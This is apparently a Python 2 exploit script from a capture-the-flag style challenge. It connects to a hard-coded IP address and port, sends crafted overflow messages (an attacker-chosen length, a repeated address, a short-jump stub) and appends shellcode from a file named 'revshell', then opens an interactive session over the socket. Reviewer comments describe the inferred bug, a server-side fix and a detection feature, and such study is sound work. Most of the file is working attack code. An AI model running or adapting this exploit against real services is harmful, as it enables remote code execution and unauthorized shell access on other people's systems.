import os
import random
import sys
import struct
import socket
import telnetlib
import time

# Endpoint of the service this script talks to, hard-coded by the author as
# an IPv4 address and a TCP port.
host, port = "23.23.190.205", 8888

##########################################################################
# Exploit start
##########################################################################

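# Open a TCP connection to the configured endpoint. Every message below is
# written to this one socket.
s = socket.socket()
s.connect((host, port))

# Read the payload that is appended to the last message from the local file
# "revshell", as raw bytes. The context manager closes the handle even when
# the read raises, which the manual open/read/close sequence did not.
with open("revshell", "rb") as f:
    shellcode = f.read()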

# Block until the operator presses Enter; nothing is sent before that.
# raw_input exists only in Python 2, so this script targets Python 2.
raw_input("Ready? ")

# 32-bit value embedded in message 2 below; message 3 is sized from it.
overflow_size = 0x4141

# Five newline-terminated messages follow. Integers are packed with struct
# format 'I' (unsigned int, native byte order).
#
# NOTE(review): the layout suggests the service accepts a length supplied by
# the client (overflow_size) and then reads that much data into a smaller
# buffer. This is inferred from the payload shape only; the service code is
# not shown here. The server-side fix would be to bound every
# client-supplied length against the destination buffer before copying.

# Message 1: 0x28 filler bytes, then the packed integer 100.
s.send("A" * 0x28 + struct.pack('I', 100) + "\n")
# Message 2: the same 0x28-byte filler with the integer 200, padded with "B"
# to 0x50 bytes, then overflow_size packed as a 32-bit value.
s.send(("A" * 0x28 + struct.pack('I', 200)).ljust(0x50, "B") + struct.pack('I', overflow_size) + "\n")
# Message 3: the packed constant 0x80484C3 repeated (overflow_size - 2) / 4
# times. This relies on Python 2 integer division (4175 repetitions); under
# Python 3 the "/" yields a float and the multiplication raises TypeError.
# presumably 0x80484C3 is an address inside the target binary; TODO confirm.
# For detection, a long run of one repeated 4-byte value in client input is
# the distinctive feature of this message.
s.send(struct.pack('I', 0x80484C3) * ((overflow_size - 2) / 4) + "\n")
# Message 4: 0x28 filler bytes, then the packed integer 300.
s.send("A" * 0x28 + struct.pack('I', 300) + "\n")
# Message 5: the two bytes "\xeb\x2a" plus 0x26 filler bytes (0x28 in total),
# the packed integer 50, then the contents of the "revshell" file.
# NOTE(review): read as x86 code, "\xeb\x2a" is a short jump of 0x2a bytes,
# which is the length of the 0x26 filler plus the 4-byte integer, so it would
# land on the appended file contents. Confirm against the target binary.
s.send("\xeb\x2a" + "A" * 0x26 + struct.pack('I', 50) + shellcode + "\n")

# Attach the already-connected socket to a Telnet object and enter its
# interactive loop, which relays data between the operator's terminal and
# the connection until the session ends.
console = telnetlib.Telnet()
console.sock = s
console.interact()

